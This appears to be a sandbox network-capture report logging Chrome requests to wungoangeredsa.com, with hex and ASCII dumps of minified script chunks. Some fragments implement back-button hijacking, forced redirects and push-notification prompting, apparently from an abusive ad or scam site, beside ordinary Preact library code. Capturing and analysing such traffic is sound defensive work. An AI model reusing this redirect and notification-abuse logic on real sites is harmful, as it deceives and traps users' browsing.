                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 75 72 6c 29 29 2c 5b 22 75 72 6c 22 2c 6e 75 6c 6c 3d 3d 3d 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 75 72 6c 5d 3b 76 61 72 20 6f 3d 69 2e 7a 6f 6e 65 73 44 65 74 61 69 6c 73 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 22 6f 6e 63 6c 69 63 6b 22 3d 3d 3d 6e 2e 66 6f 72 6d 61 74 26 26 22 63 75 72 72 65 6e 74 22 3d 3d 3d 6e 2e 74 61 62 7d 29 29 2c 72 3d 28 6e 75 6c 6c 3d 3d 3d 6f 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 69 64 29 7c 7c 65 3b 72 65 74 75 72 6e 20 72 3d 28 30 2c 75 2e 70 52 29 28 72 29 2c 28 30 2c 61 2e 50 4e 29 28 22 42 61 63 6b 20 69 6e 69 74 65 64 20 6f 6e 20 7a 6f 6e 65 54 79 70 65 3a 20 22
                                                                                                          Data Ascii: ||void 0===t?void 0:t.url)),["url",null===t||void 0===t?void 0:t.url];var o=i.zonesDetails.find((function(n){return"onclick"===n.format&&"current"===n.tab})),r=(null===o||void 0===o?void 0:o.id)||e;return r=(0,u.pR)(r),(0,a.PN)("Back inited on zoneType: "
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 64 2c 43 3d 6e 2e 62 61 63 6b 5a 6f 6e 65 54 79 70 65 2c 50 3d 76 6f 69 64 20 30 3d 3d 3d 43 3f 75 2e 74 2e 62 61 63 6b 4d 61 69 6e 45 78 69 74 3a 43 2c 44 3d 6e 2e 6c 61 73 74 53 74 65 70 41 75 64 69 65 6e 63 65 2c 53 3d 6e 2e 64 65 6c 61 79 43 75 72 72 65 6e 74 45 78 69 74 2c 54 3d 6e 2e 73 68 6f 75 6c 64 53 65 74 43 6f 6f 6b 69 65 73 2c 67 3d 76 6f 69 64 20 30 3d 3d 3d 54 7c 7c 54 2c 4f 3d 6e 2e 7a 6f 6e 65 73 2c 41 3d 6e 2e 69 73 52 65 64 69 72 65 63 74 42 79 4e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 2c 49 3d 6e 2e 73 68 6f 75 6c 64 44 65 6c 61 79 41 62 69 6c 69 74 79 54 6f 52 65 64 69 72 65 63 74 2c 5f 3d 6e 2e 63 6f 6e 76 65 72 73 69 6f 6e 2c 78 3d 6e 2e 6f 6e 4d 61 69 6e 45 78 69 74 2c 55 3d 6e 2e 63 75 73 74 6f 6d 43 72 65 61 74 65 43
                                                                                                          Data Ascii: d,C=n.backZoneType,P=void 0===C?u.t.backMainExit:C,D=n.lastStepAudience,S=n.delayCurrentExit,T=n.shouldSetCookies,g=void 0===T||T,O=n.zones,A=n.isRedirectByNotificationStatus,I=n.shouldDelayAbilityToRedirect,_=n.conversion,x=n.onMainExit,U=n.customCreateC
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 63 75 73 74 6f 6d 54 61 67 49 6e 69 74 29 7b 69 66 28 21 68 26 26 73 29 72 65 74 75 72 6e 28 30 2c 63 2e 63 4d 29 28 22 5b 75 73 65 52 65 64 69 72 65 63 74 52 65 73 74 72 69 63 74 69 6f 6e 5d 20 64 6f 65 73 6e 27 74 20 77 61 69 74 20 66 6f 72 20 74 68 65 20 70 75 73 68 20 74 61 67 20 74 6f 20 62 65 20 63 72 65 61 74 65 64 20 62 65 63 61 75 73 65 20 69 74 20 69 73 20 69 6e 63 6f 67 6e 69 74 6f 22 29 2c 76 6f 69 64 20 45 28 21 30 29 3b 28 30 2c 63 2e 63 4d 29 28 22 5b 75 73 65 52 65 64 69 72 65 63 74 52 65 73 74 72 69 63 74 69 6f 6e 5d 20 77 61 69 74 20 66 6f 72 20 74 68 65 20 70 75 73 68 20 74 61 67 20 74 6f 20 62 65 20 63 72 65 61 74 65 64 20 6f 72 20 63 68 65 63 6b 20 77 69 6e 64 6f 77 2e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 29 2c 21 61 2e 6c 65 6e 67
                                                                                                          Data Ascii: customTagInit){if(!h&&s)return(0,c.cM)("[useRedirectRestriction] doesn't wait for the push tag to be created because it is incognito"),void E(!0);(0,c.cM)("[useRedirectRestriction] wait for the push tag to be created or check window.Notification"),!a.leng
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 62 73 63 72 69 62 65 64 3a 6e 6e 2c 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 55 6e 73 75 70 70 6f 72 74 65 64 3a 65 6e 7d 29 7c 7c 65 7d 29 2c 5b 74 6e 5d 29 2c 72 6e 3d 28 30 2c 6f 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 6e 28 22 63 75 72 72 65 6e 74 22 2c 55 29 7d 29 2c 5b 6f 6e 2c 55 5d 29 2c 61 6e 3d 28 30 2c 6f 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 6e 28 22 6e 65 77 22 2c 77 29 7d 29 2c 5b 6f 6e 2c 77 5d 29 2c 63 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 7a 29 28 30 2c 63 2e 79 4e 29 28 22 5b 68 61 6e 64 6c 65 4d 61 69 6e 45 78 69 74 5d 20 45 78 69 74 20 68 61 73 20 62 65 65 6e 20 61 6c 72 65 61
                                                                                                          Data Ascii: bscribed:nn,mainExitOnNotificationUnsupported:en})||e}),[tn]),rn=(0,o.useCallback)((function(){return on("current",U)}),[on,U]),an=(0,o.useCallback)((function(){return on("new",w)}),[on,w]),cn=function(){if(z)(0,c.yN)("[handleMainExit] Exit has been alrea
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 32 34 39 39 29 3b 69 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 28 30 2c 63 2e 45 29 28 29 2e 67 65 74 45 78 69 74 55 72 6c 2c 69 3d 28 30 2c 72 2e 62 70 29 28 29 2e 73 74 61 74 65 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 53 74 61 74 75 73 3b 72 65 74 75 72 6e 7b 67 65 74 4d 61 69 6e 45 78 69 74 42 79 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 63 3d 65 2e 74 61 62 2c 73 3d 65 2e 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 42 65 66 6f 72 65 50 65 72 6d 69 73 73 69 6f 6e 50 72 6f 6d 70 74 2c 75 3d 65 2e 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 50 65 72 6d 69 73 73 69 6f 6e 44 65 66 61 75 6c 74 2c 6c 3d 65 2e 6d 61 69 6e 45 78 69 74 4f 6e 4e 6f 74
                                                                                                          Data Ascii: 2499);i.Z=function(){var n=(0,c.E)().getExitUrl,i=(0,r.bp)().state.notificationStatus;return{getMainExitByNotification:function(e){var r,c=e.tab,s=e.mainExitOnNotificationBeforePermissionPrompt,u=e.mainExitOnNotificationPermissionDefault,l=e.mainExitOnNot
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 71 75 65 73 74 50 65 72 6d 69 73 73 69 6f 6e 4f 6e 55 73 65 72 41 63 74 69 6f 6e 2c 43 3d 6e 2e 64 6f 50 75 73 68 44 6f 6d 61 69 6e 73 2c 50 3d 43 3f 28 30 2c 61 2e 5a 29 28 28 30 2c 72 2e 5a 29 28 7b 7d 2c 6c 29 2c 28 30 2c 6f 2e 5a 29 28 7b 7d 2c 75 2e 79 2e 44 4f 2c 43 29 29 3a 6c 2c 44 3d 6e 75 6c 6c 21 3d 3d 28 69 3d 28 30 2c 73 2e 72 29 28 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 50 5b 28 30 2c 63 2e 63 29 28 6c 61 6e 64 44 61 74 61 29 2e 70 72 6f 6a 65 63 74 5d 2c 53 3d 6e 75 6c 6c 21 3d 3d 70 26 26 76 6f 69 64 20 30 21 3d 3d 70 3f 70 3a 28 30 2c 64 2e 6b 29 28 44 29 2c 54 3d 28 30 2c 66 2e 53 29 28 7b 6f 61 69 64 3a 65 2c 6f 73 56 65 72 73 69 6f 6e 3a 74 2c 73 75 62 49 64 3a 6d 2c 70 61 73 73 50 61 72 61 6d 54 6f 50 61 72 61 6d 73 3a 62
                                                                                                          Data Ascii: questPermissionOnUserAction,C=n.doPushDomains,P=C?(0,a.Z)((0,r.Z)({},l),(0,o.Z)({},u.y.DO,C)):l,D=null!==(i=(0,s.r)())&&void 0!==i?i:P[(0,c.c)(landData).project],S=null!==p&&void 0!==p?p:(0,d.k)(D),T=(0,f.S)({oaid:e,osVersion:t,subId:m,passParamToParams:b


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.450077104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC553OUTGET /_next/static/chunks/1c02c3e681ea9f6d-1736072686539-ebf163de3da5e125.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-682f"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415ef9294376-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 36 38 32 66 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 39 37 37 34 5d 2c 7b 31 32 31 33 39 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 74 2e 64 28 65 2c 7b 43 68 69 6c 64 72 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 7d 2c 43 6f 6d 70 6f 6e 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 77 41 7d 2c 46 72 61 67 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 48 59 7d 2c 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 7d 2c 53 74 72
                                                                                                          Data Ascii: 682f"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49774],{12139:function(n,e,t){t.r(e),t.d(e,{Children:function(){return $},Component:function(){return i.wA},Fragment:function(){return i.HY},PureComponent:function(){return F},Str
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 6e 7d 2c 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 6e 7d 2c 6c 61 7a 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 7d 2c 6d 65 6d 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 2c 72 65 6e 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 6e 7d 2c 73 74 61 72 74 54 72 61 6e 73 69 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 59 6e 7d 2c 75 6e 6d 6f 75 6e 74 43 6f 6d 70 6f 6e 65 6e 74 41 74 4e 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 6e 7d 2c 75 6e 73 74 61 62 6c 65 5f 62 61 74 63 68 65 64 55 70 64 61 74 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65
                                                                                                          Data Ascii: ion(){return xn},isValidElement:function(){return Sn},lazy:function(){return K},memo:function(){return I},render:function(){return an},startTransition:function(){return Yn},unmountComponentAtNode:function(){return Rn},unstable_batchedUpdates:function(){re
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6e 29 7b 72 65 74 75 72 6e 21 21 6e 2e 5f 5f 63 7d 29 29 3b 69 66 28 5f 2e 65 76 65 72 79 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 21 6e 2e 5f 5f 4e 7d 29 29 29 72 65 74 75 72 6e 21 69 7c 7c 69 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 74 29 3b 76 61 72 20 72 3d 21 31 3b 72 65 74 75 72 6e 20 5f 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 6e 2e 5f 5f 4e 29 7b 76 61 72 20 65 3d 6e 2e 5f 5f 5b 30 5d 3b 6e 2e 5f 5f 3d 6e 2e 5f 5f 4e 2c 6e 2e 5f 5f 4e 3d 76 6f 69 64 20 30 2c 65 21 3d 3d 6e 2e 5f 5f 5b 30 5d 26 26 28 72 3d 21 30 29 7d 7d 29 29 2c 21 28 21 72 26 26 6f 2e 5f 5f 63 2e 70 72 6f 70 73 3d 3d 3d 6e 29 26 26 28 21 69 7c 7c 69 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 74 29 29 7d 3b 72 2e 75 3d 21
                                                                                                          Data Ascii: n){return!!n.__c}));if(_.every((function(n){return!n.__N})))return!i||i.call(this,n,e,t);var r=!1;return _.forEach((function(n){if(n.__N){var e=n.__[0];n.__=n.__N,n.__N=void 0,e!==n.__[0]&&(r=!0)}})),!(!r&&o.__c.props===n)&&(!i||i.call(this,n,e,t))};r.u=!
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 2c 31 31 29 3b 69 66 28 21 6e 2e 5f 5f 29 7b 66 6f 72 28 76 61 72 20 65 3d 72 2e 5f 5f 76 3b 6e 75 6c 6c 21 3d 3d 65 26 26 21 65 2e 5f 5f 6d 26 26 6e 75 6c 6c 21 3d 3d 65 2e 5f 5f 3b 29 65 3d 65 2e 5f 5f 3b 76 61 72 20 74 3d 65 2e 5f 5f 6d 7c 7c 28 65 2e 5f 5f 6d 3d 5b 30 2c 30 5d 29 3b 6e 2e 5f 5f 3d 22 50 22 2b 74 5b 30 5d 2b 22 2d 22 2b 74 5b 31 5d 2b 2b 7d 72 65 74 75 72 6e 20 6e 2e 5f 5f 7d 66 75 6e 63 74 69 6f 6e 20 48 28 29 7b 66 6f 72 28 76 61 72 20 6e 3b 6e 3d 63 2e 73 68 69 66 74 28 29 3b 29 69 66 28 6e 2e 5f 5f 50 26 26 6e 2e 5f 5f 48 29 74 72 79 7b 6e 2e 5f 5f 48 2e 5f 5f 68 2e 66 6f 72 45 61 63 68 28 54 29 2c 6e 2e 5f 5f 48 2e 5f 5f 68 2e 66 6f 72 45 61 63 68 28 59 29 2c 6e 2e 5f 5f 48 2e 5f 5f 68 3d 5b 5d 7d 63 61 74 63 68 28 5f 29 7b 6e 2e
                                                                                                          Data Ascii: ,11);if(!n.__){for(var e=r.__v;null!==e&&!e.__m&&null!==e.__;)e=e.__;var t=e.__m||(e.__m=[0,0]);n.__="P"+t[0]+"-"+t[1]++}return n.__}function H(){for(var n;n=c.shift();)if(n.__P&&n.__H)try{n.__H.__h.forEach(T),n.__H.__h.forEach(Y),n.__H.__h=[]}catch(_){n.
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 5f 5f 63 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 6e 2e 5f 5f 63 3d 76 6f 69 64 20 30 2c 74 28 29 29 2c 72 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 59 28 6e 29 7b 76 61 72 20 65 3d 72 3b 6e 2e 5f 5f 63 3d 6e 2e 5f 5f 28 29 2c 72 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 6e 2c 65 29 7b 72 65 74 75 72 6e 21 6e 7c 7c 6e 2e 6c 65 6e 67 74 68 21 3d 3d 65 2e 6c 65 6e 67 74 68 7c 7c 65 2e 73 6f 6d 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 6e 5b 74 5d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 6e 2c 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 28 6e 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 6e 2c 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20
                                                                                                          Data Ascii: __c;"function"==typeof t&&(n.__c=void 0,t()),r=e}function Y(n){var e=r;n.__c=n.__(),r=e}function D(n,e){return!n||n.length!==e.length||e.some((function(e,t){return e!==n[t]}))}function A(n,e){return"function"==typeof e?e(n):e}function O(n,e){for(var t in
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 42 2c 66 6f 72 45 61 63 68 3a 42 2c 63 6f 75 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3f 28 30 2c 69 2e 62 52 29 28 6e 29 2e 6c 65 6e 67 74 68 3a 30 7d 2c 6f 6e 6c 79 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 28 30 2c 69 2e 62 52 29 28 6e 29 3b 69 66 28 31 21 3d 3d 65 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 22 43 68 69 6c 64 72 65 6e 2e 6f 6e 6c 79 22 3b 72 65 74 75 72 6e 20 65 5b 30 5d 7d 2c 74 6f 41 72 72 61 79 3a 69 2e 62 52 7d 2c 5a 3d 69 2e 59 4d 2e 5f 5f 65 3b 69 2e 59 4d 2e 5f 5f 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 2c 5f 29 7b 69 66 28 6e 2e 74 68 65 6e 29 66 6f 72 28 76 61 72 20 72 2c 6f 3d 65 3b 6f 3d 6f 2e 5f 5f 3b 29 69 66 28 28 72 3d 6f 2e 5f 5f 63 29 26 26 72 2e 5f 5f 63 29 72 65 74 75 72
                                                                                                          Data Ascii: B,forEach:B,count:function(n){return n?(0,i.bR)(n).length:0},only:function(n){var e=(0,i.bR)(n);if(1!==e.length)throw"Children.only";return e[0]},toArray:i.bR},Z=i.YM.__e;i.YM.__e=function(n,e,t,_){if(n.then)for(var r,o=e;o=o.__;)if((r=o.__c)&&r.__c)retur
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 2d 2d 5f 2e 5f 5f 75 29 7b 69 66 28 5f 2e 73 74 61 74 65 2e 5f 5f 61 29 7b 76 61 72 20 6e 3d 5f 2e 73 74 61 74 65 2e 5f 5f 61 3b 5f 2e 5f 5f 76 2e 5f 5f 6b 5b 30 5d 3d 58 28 6e 2c 6e 2e 5f 5f 63 2e 5f 5f 50 2c 6e 2e 5f 5f 63 2e 5f 5f 4f 29 7d 76 61 72 20 65 3b 66 6f 72 28 5f 2e 73 65 74 53 74 61 74 65 28 7b 5f 5f 61 3a 5f 2e 5f 5f 62 3d 6e 75 6c 6c 7d 29 3b 65 3d 5f 2e 74 2e 70 6f 70 28 29 3b 29 65 2e 66 6f 72 63 65 55 70 64 61 74 65 28 29 7d 7d 3b 5f 2e 5f 5f 75 2b 2b 7c 7c 33 32 26 65 2e 5f 5f 75 7c 7c 5f 2e 73 65 74 53 74 61 74 65 28 7b 5f 5f 61 3a 5f 2e 5f 5f 62 3d 5f 2e 5f 5f 76 2e 5f 5f 6b 5b 30 5d 7d 29 2c 6e 2e 74 68 65 6e 28 75 2c 75 29 7d 2c 47 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 6f 6e 65 6e
                                                                                                          Data Ascii: function(){if(!--_.__u){if(_.state.__a){var n=_.state.__a;_.__v.__k[0]=X(n,n.__c.__P,n.__c.__O)}var e;for(_.setState({__a:_.__b=null});e=_.t.pop();)e.forceUpdate()}};_.__u++||32&e.__u||_.setState({__a:_.__b=_.__v.__k[0]}),n.then(u,u)},G.prototype.componen
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 5f 76 29 2c 65 2e 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 6e 28 6e 2c 65 29 7b 76 61 72 20 74 3d 28 30 2c 69 2e 61 7a 29 28 74 6e 2c 7b 5f 5f 76 3a 6e 2c 69 3a 65 7d 29 3b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 74 61 69 6e 65 72 49 6e 66 6f 3d 65 2c 74 7d 28 51 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20 69 2e 77 41 29 2e 5f 5f 61 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 4a 28 65 2e 5f 5f 76 29 2c 5f 3d 65 2e 6f 2e 67 65 74 28 6e 29 3b 72 65 74 75 72 6e 20 5f 5b 30 5d 2b 2b 2c 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 72 6f 70 73 2e 72 65 76 65 61 6c 4f 72 64 65 72 3f 28 5f 2e 70 75 73 68 28 72 29 2c 6e 6e 28 65 2c 6e 2c 5f 29 29 3a 72 28 29 7d 3b 74 3f 74 28 6f 29 3a
                                                                                                          Data Ascii: _v),e.l)}function _n(n,e){var t=(0,i.az)(tn,{__v:n,i:e});return t.containerInfo=e,t}(Q.prototype=new i.wA).__a=function(n){var e=this,t=J(e.__v),_=e.o.get(n);return _[0]++,function(r){var o=function(){e.props.revealOrder?(_.push(r),nn(e,n,_)):r()};t?t(o):
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6f 74 6f 74 79 70 65 2e 69 73 52 65 61 63 74 43 6f 6d 70 6f 6e 65 6e 74 3d 7b 7d 2c 5b 22 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 4d 6f 75 6e 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 52 65 63 65 69 76 65 50 72 6f 70 73 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 70 64 61 74 65 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2e 77 41 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 5b 22 55 4e 53 41 46 45 5f 22 2b 6e 5d 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74
                                                                                                          Data Ascii: ototype.isReactComponent={},["componentWillMount","componentWillReceiveProps","componentWillUpdate"].forEach((function(n){Object.defineProperty(i.wA.prototype,n,{configurable:!0,get:function(){return this["UNSAFE_"+n]},set:function(e){Object.definePropert
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6c 74 69 70 6c 65 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 5f 2e 76 61 6c 75 65 29 26 26 28 5f 2e 76 61 6c 75 65 3d 28 30 2c 69 2e 62 52 29 28 65 2e 63 68 69 6c 64 72 65 6e 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3d 2d 31 21 3d 5f 2e 76 61 6c 75 65 2e 69 6e 64 65 78 4f 66 28 6e 2e 70 72 6f 70 73 2e 76 61 6c 75 65 29 7d 29 29 29 2c 22 73 65 6c 65 63 74 22 3d 3d 74 26 26 6e 75 6c 6c 21 3d 5f 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 26 26 28 5f 2e 76 61 6c 75 65 3d 28 30 2c 69 2e 62 52 29 28 65 2e 63 68 69 6c 64 72 65 6e 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3d 5f 2e 6d 75 6c 74 69 70 6c 65 3f 2d 31
                                                                                                          Data Ascii: ltiple&&Array.isArray(_.value)&&(_.value=(0,i.bR)(e.children).forEach((function(n){n.props.selected=-1!=_.value.indexOf(n.props.value)}))),"select"==t&&null!=_.defaultValue&&(_.value=(0,i.bR)(e.children).forEach((function(n){n.props.selected=_.multiple?-1


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.450078104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC553OUTGET /_next/static/chunks/4d859cac5ba89327-1736072686539-7c9f685438bac6d8.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC497INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1ac86"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb415f19728c1d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
